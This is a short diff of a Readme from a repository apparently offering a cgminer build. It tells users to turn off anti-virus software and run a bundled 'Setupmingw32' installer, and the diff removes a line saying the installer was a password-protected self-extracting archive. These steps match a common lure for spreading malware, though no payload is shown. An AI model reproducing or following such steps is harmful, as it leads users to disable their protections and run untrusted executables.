JoeBatista1988/-cgminer2022/Readme.txt

 **************************************************************************************
 * Install mingw32                                                                    *
 **************************************************************************************
 Turn off any protecting or anti-virus software.
-Than open self extracting archive Setupmingw32 install.Password is CGMiner
+Than open Setupmingw32 install.
 You will see process of installation for 1-3 minutes.Install MinGW in the default directory.
 Make sure to check the option for "Download latest repository catalogs".